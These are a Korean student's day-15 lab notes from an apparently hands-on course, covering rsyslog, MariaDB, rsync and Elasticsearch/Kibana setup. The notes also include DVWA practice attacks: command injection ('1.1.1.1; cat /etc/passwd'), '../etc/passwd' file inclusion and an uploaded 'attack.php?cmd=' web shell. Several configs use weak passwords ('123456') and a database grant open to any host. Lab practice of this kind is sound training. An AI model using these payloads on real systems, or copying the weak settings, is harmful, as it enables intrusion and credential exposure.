15일차


시스템 사용자를 찾기
kali >
ssh 125.246.95.152
ssh 루트 접속 가능여부
nano /etc/ssh/sshd_config

# Authentication:

#LoginGraceTime 2m
#PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
root로 들어갈수 없음 일반사용자를 찾아야함


adduser word
adduser dvwa
adduser web1
adduser web2

cat /etc/password

1.1.1.1; cat /etc/passwd

file inclusion
file 1,2,3이 다른데 로그들을 가지고있음
?page=file1.php
?page=../etc/passwd (../ 파일 위치 넘어가는 횟수에 따라 적기)


attack.php를 업로드 한다.
attack.php?cmd=ls
attack.php?cmd=cat /etc/passwd





파일이 업로드 안될때
chmod 777 해당경로 로 바꿔준다

그리고 업로드된 위치를 찾아서 들어가면 attack.php가 보인다

http://dvwa.st.kr/~dvwa/DVWA-master/hackable/uploads/attack.php?cmd=cat%20/etc/passwd
로들어가면 로그가 보인다

ssh 접근 차단
1. 열고 닫기
2. 닫고 열기 > 다 닫힘
/etc/hosts.allow
/etc/hosts.deny
ssh 번호를 변경하라
nano /etc/ssh/sshd_config

mysql
use Syslog
select FromHost,Message from SystemEvents limi;



rsyslog 시스템 구축
3대서버로 부터 전송되 로그를 분석 및 저장
nano /etc/rsyslog.conf
서버는 포트(514)를 열고 3대서버로부터 데이터가 전송되는 것을 기다림
module(load="imtcp")
input(type="imtcp" port="514")
$AllowedSender TCP,10.0.2.0/24 *.st.kr
apt -y install net-tools
netstat -ant | grep 514
systemctl restart rsyslog

apt -y install mariadb-server
apt -y install rsyslog-mysql
123456[대문자]
mysql
use Syslog;
desc SystemEvents;
select * from systemEvents;

#Rsync 설정
apt -y install rsync
nano /etc/rsyncd.conf
# create new
# any name you like
[backup]
# target directory to copy
path = /backup
# hosts you allow to access
hosts allow = 10.0.2.15
hosts deny = *
list = true
uid = root
gid = root
read only = false







nano /etc/rsyslog.d/50-default.conf
target="10.0.2.3"

Syslog rsyslog 123456

ln -sf /usr/share/zoneinfo/Asia/Seoul /etc/localtime




sudo apt -y install default-jre
sudo apt -y install default-jdk
sudo apt -y install nginx

curl -fsSL https://artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg
echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list
sudo apt update
sudo apt -y install elasticsearch
/etc/elasticsearch/elasticsearch.yml

sudo systemctl start elasticsearch
sudo systemctl enable elasticsearch
curl -X GET "localhost:9200"

sudo apt -y install kibana
sudo systemctl start kibana
sudo systemctl enable kibana



create user rsyslog@'192.168.0.217' identified by '123456;';
grant all on Syslog.* to rsyslog@'192.168.0.217';
flush privileges;

create user rsyslog@'%' identified by '123456;';
grant all on Syslog.* to rsyslog@'%';
flush privileges;